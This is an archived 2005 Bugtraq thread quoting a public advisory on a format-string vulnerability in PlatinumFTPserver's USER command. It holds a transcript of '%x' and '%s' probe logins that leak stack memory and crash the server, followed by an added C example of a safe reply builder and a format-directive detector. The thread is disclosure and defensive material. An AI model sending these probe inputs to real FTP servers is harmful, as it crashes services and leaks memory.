Actually, the credits don't go to you; these vulnerabilities have been found already. I've replied recently to this mailing list in regards to this software. If you had disassembled the binary, then why not mention that the vulnerability exists in a 3rd party ActiveX control, and not the software itself?

My reply:
http://www.securityfocus.com/archive/1/393256/2005-03-13/2005-03-19/0

Please read the links below:
http://www.osvdb.org/displayvuln.php?osvdb_id=3461
http://secunia.com/advisories/9127/
http://secunia.com/advisories/10608/
http://secunia.com/advisories/9013/

-Gary H. Jones II

----- Original Message -----
From: <c0d3r@xxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Cc: <news@xxxxxxxxxxxxxx>
Sent: Wednesday, March 16, 2005 8:56 AM
Subject: PlatinumFTPserver format string vulnerability ( IHSTeam )

**********************************************************************
advisory URL : http://www.ihsteam.com/advisory/PlatinumFTPserver.txt
**********************************************************************

********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi" c0d3r@xxxxxxxxxxx
********************************************

Well, yesterday a guy found a simple USER overflow in PlatinumFTPserver version 1.0.18 and prior. I downloaded the package at:
http://www.roboshareware.com/products/PlatinumFTPserver.exe
and started to disassemble the vulnerability. He had written a DoS. PlatinumFTP has got a good error controlling system, so EIP overwrite is not easy, but I found another vulnerability when I was fuzzing: the server is also vulnerable to a USER format string attack. Here is the result:

---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x
331 Password required for AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414
1782578257825782578257825782578257825782578257825782578257825782578257825782
5782578257825782578257825782578257825782578257825782578257825782578257825782
5d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAAÈsÈjÈ{PÈ` .
Password:
---------------------------------------
ftp> user AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe   szAppVer : 1.0.0.18
szModName : user32.dll   szModVer : 5.1.2600.1106   offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the memory could not be "written".
---------------------------------------

And these kinda playing! I am busy with university entrance exam stuff so I can't write the exploit code, and really it doesn't cost. Well, laters. And this will be the last sweet to IHS until my shitty exam. All the credits go to IHSteam.com.

Greetz fly to: LorD and NT of ihsteam, Jamie of exploitdev.org and other friends and security teams. Well, I will come to u later shervin_kesafat my great lamer!
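The session above shows the classic symptom of a user-controlled format string: `%x` in the login name dumps stack words into the 331 reply and `%s` dereferences them until the engine faults. The following is an added example, not code from the advisory or from PlatinumFTPserver; the function names (reply_safe, has_format_directive) are assumed. It shows the reply builder written so the username can only ever be data, plus the check a server or log parser can use to flag such probes.

```c
#include <stdio.h>
#include <string.h>

/* Bug pattern the advisory describes (shown only as a comment, because its
 * behaviour on "%x"/"%s" input is undefined and it must never run):
 *
 *     snprintf(fmt, sizeof fmt, "331 Password required for user %s.", user);
 *     snprintf(out, outlen, fmt);        <- username becomes the format
 *
 * Every '%' conversion in the username is then interpreted against the
 * stack, which is exactly what the 331 replies in the session show. */

/* Hardened form: the format is a constant and the username is passed only
 * as a %s argument, so any '%' it contains is copied literally.
 * Returns 1 on success, 0 if the reply did not fit in `out`. */
static int reply_safe(char *out, size_t outlen, const char *user)
{
    int n = snprintf(out, outlen, "331 Password required for user %s.\r\n", user);
    return n >= 0 && (size_t)n < outlen;
}

/* Detection/rejection helper: does the login name carry a printf-style
 * conversion, i.e. a '%' not immediately followed by another '%'?
 * "%%" is an escaped literal percent and is left alone. A server can refuse
 * such names and a log monitor can alert on them. */
static int has_format_directive(const char *s)
{
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        if (p[1] == '%') { p++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed login names, including the advisory's own probes. */
    const char *names[] = { "user %x%x", "AAAA%s%s", "alice", "50%%off" };
    char buf[128];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        reply_safe(buf, sizeof buf, names[i]);
        printf("%-12s directive=%d  reply=%s",
               names[i], has_format_directive(names[i]), buf);
    }
    return 0;
}
```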